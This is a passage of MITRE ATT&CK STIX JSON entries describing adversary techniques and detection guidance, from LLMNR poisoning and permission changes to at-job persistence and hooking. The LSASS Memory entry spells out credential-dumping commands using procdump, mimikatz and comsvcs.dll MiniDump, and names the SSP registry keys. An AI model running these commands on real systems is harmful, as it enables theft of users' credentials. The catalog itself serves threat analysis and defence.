"attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "created": "2020-01-28T17:05:14.707Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070/001", "external_id": "T1070.001"}, {"source_name": "disable_win_evt_logging", "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.", "url": "https://ptylu.github.io/content/report/report.html?report=25"}, {"source_name": "Microsoft Clear-EventLog", "description": "Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.", "url": "https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog"}, {"source_name": "Microsoft EventLog.Clear", "description": "Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018.", "url": "https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx"}, {"source_name": "Microsoft wevtutil Oct 2017", "description": "Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018.", "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-02-28T21:11:27.088Z", "name": "Email Accounts", "description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Establishing email accounts may also allow adversaries to abuse free services \u2013 such as trial periods \u2013 to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin)\n\nAdversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a", "created": "2020-10-01T01:09:53.217Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1585/002", "external_id": "T1585.002"}, {"source_name": "Trend Micro R980 2016", "description": "Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware Found Abusing Disposable Email Address Service. Retrieved October 13, 2020.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/"}, {"source_name": "Free Trial PurpleUrchin", "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.", "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/"}, {"source_name": "Mandiant APT1", "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-04-25T14:00:00.188Z", "name": "LLMNR/NBT-NS Poisoning and SMB Relay", "description": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords.\n\nIn some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.\u00a0\n\nSeveral tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.0.0", "x_mitre_contributors": ["Eric Kuehn, Secure Ideas", "Matthew Demaske, Adaptforward", "Andrew Allen, @whitehat_zero"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \u201c0\u201d indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", "created": "2020-02-11T19:08:51.677Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1557/001", "external_id": "T1557.001"}, {"source_name": "Rapid7 LLMNR Spoofer", "description": "Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.", "url": "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response"}, {"source_name": "GitHub Responder", "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.", "url": "https://github.com/SpiderLabs/Responder"}, {"source_name": "Secure Ideas SMB Relay", "description": "Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.", "url": "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html"}, {"source_name": "TechNet NetBIOS", "description": "Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.", "url": "https://technet.microsoft.com/library/cc958811.aspx"}, {"source_name": "GitHub NBNSpoof", "description": "Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.", "url": "https://github.com/nomex/nbnspoof"}, {"source_name": "GitHub Conveigh", "description": "Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.", "url": "https://github.com/Kevin-Robertson/Conveigh"}, {"source_name": "byt3bl33d3r NTLM Relaying", "description": "Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.", "url": "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html"}, {"source_name": "Sternsecurity LLMNR-NBTNS", "description": "Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.", "url": "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning"}, {"source_name": "Wikipedia LLMNR", "description": "Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.", "url": "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-11-08T14:00:00.188Z", "name": "File and Directory Permissions Modification", "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory\u2019s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["CrowdStrike Falcon OverWatch", "Jan Miller, CrowdStrike"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["File system access controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "created": "2018-10-17T00:14:20.652Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1222", "external_id": "T1222"}, {"source_name": "falconoverwatch_blackcat_attack", "description": "Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022.", "url": "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/"}, {"source_name": "Hybrid Analysis Icacls1 June 2018", "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.", "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"}, {"source_name": "Hybrid Analysis Icacls2 May 2018", "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.", "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110"}, {"source_name": "bad_luck_blackcat", "description": "Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.", "url": "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf"}, {"source_name": "fsutil_behavior", "description": "Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.", "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior"}, {"source_name": "EventTracker File Permissions Feb 2014", "description": "Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.", "url": "https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/"}, {"source_name": "blackmatter_blackcat", "description": "Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.", "url": "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html"}, {"source_name": "new_rust_based_ransomware", "description": "Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.", "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-12-27T17:57:20.003Z", "name": "LSASS Memory", "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run using:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\nBuilt-in Windows tools such as `comsvcs.dll` can also be used:\n\n* rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\n\nSimilar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Edward Millington", "Ed Williams, Trustwave, SpiderLabs", "Olaf Hartong, Falcon Force"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", "created": "2020-02-11T18:41:44.783Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1003/001", "external_id": "T1003.001"}, {"source_name": "Medium Detecting Attempts to Steal Passwords from Memory", "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea"}, {"source_name": "Deep Instinct LSASS", "description": "Gilboa, A. (2021, February 16). LSASS Memory Dumps are Stealthier than Ever Before - Part 2. Retrieved December 27, 2023.", "url": "https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2"}, {"source_name": "Graeber 2014", "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html"}, {"source_name": "Volexity Exchange Marauder March 2021", "description": "Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.", "url": "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"}, {"source_name": "Powersploit", "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", "url": "https://github.com/mattifestation/PowerSploit"}, {"source_name": "Symantec Attacks Against Government Sector", "description": "Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.", "url": "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf"}, {"source_name": "TechNet Blogs Credential Protection", "description": "Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.", "url": "https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "At (Linux)", "description": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\n\nAn adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\n\nAdversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux"], "x_mitre_version": "1.1", "x_mitre_remote_support": true, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e", "created": "2019-12-03T12:59:36.749Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1053/001", "external_id": "T1053.001"}, {"source_name": "rowland linux at 2019", "description": "Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.", "url": "https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/"}, {"source_name": "GTFObins at", "description": "Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.", "url": "https://gtfobins.github.io/gtfobins/at/"}, {"source_name": "Kifarunix - Task Scheduling in Linux", "description": "Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019.", "url": "https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Hooking", "description": "Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. \n\nHooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Elastic Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process\u2019s IAT, where pointers to imported API functions are stored. (Citation: Elastic Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Elastic Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.\n\nMalicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)\n\nHooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure. (Citation: Microsoft Hook Overview) (Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools (Citation: Volatility Detecting Hooks Sept 2012) (Citation: PreKageo Winhook Jul 2011) (Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures. (Citation: Zairon Hooking Dec 2006) (Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors (Citation: GMER Rootkits) can also be used to monitor for various flavors of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes (Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions. (Citation: StackExchange Hooks Jul 2012) (Citation: Adlice Software IAT Hooks Oct 2014)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--66f73398-8394-4711-85e5-34c8540b22a5", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1179", "external_id": "T1179"}, {"source_name": "Microsoft Hook Overview", "description": "Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "Adlice Software IAT Hooks Oct 2014", "description": "Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.", "url": "https://www.adlice.com/userland-rootkits-part-1-iat-hooks/"}, {"source_name": "MWRInfoSecurity Dynamic Hooking 2015", "description": "Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User Mode. Retrieved December 20, 2017.", "url": "https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/"}, {"source_name": "HighTech Bridge Inline Hooking Sept 2011", "description": "Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved December 12, 2017.", "url": "https://www.exploit-db.com/docs/17802.pdf"}, {"source_name": "Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017", "description": "Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I. Retrieved December 18, 2017.", "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918"}, {"source_name": "Symantec Windows Rootkits", "description": "Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.", "url": "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf"}, {"source_name": "Volatility Detecting Hooks Sept 2012", "description": "Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.", "url": "https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html"}, {"source_name": "PreKageo Winhook Jul 2011", "description": "Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.", "url": "https://github.com/prekageo/winhook"}, {"source_name": "Jay GetHooks Sept 2011", "description": "Satiro, J. (2011, September 14). GetHooks. Retrieved December 12, 2017.", "url": "https://github.com/jay/gethooks"}, {"source_name": "Zairon Hooking Dec 2006", "description": "Felici, M. (2006, December 6). Any application-defined hook procedure on my machine?. Retrieved December 12, 2017.", "url": "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/"}, {"source_name": "EyeofRa Detecting Hooking June 2017", "description": "Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense against user-land. Retrieved December 12, 2017.", "url": "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/"}, {"source_name": "GMER Rootkits", "description": "GMER. (n.d.). GMER. Retrieved December 12, 2017.", "url": "http://www.gmer.net/"}, {"source_name": "Microsoft Process 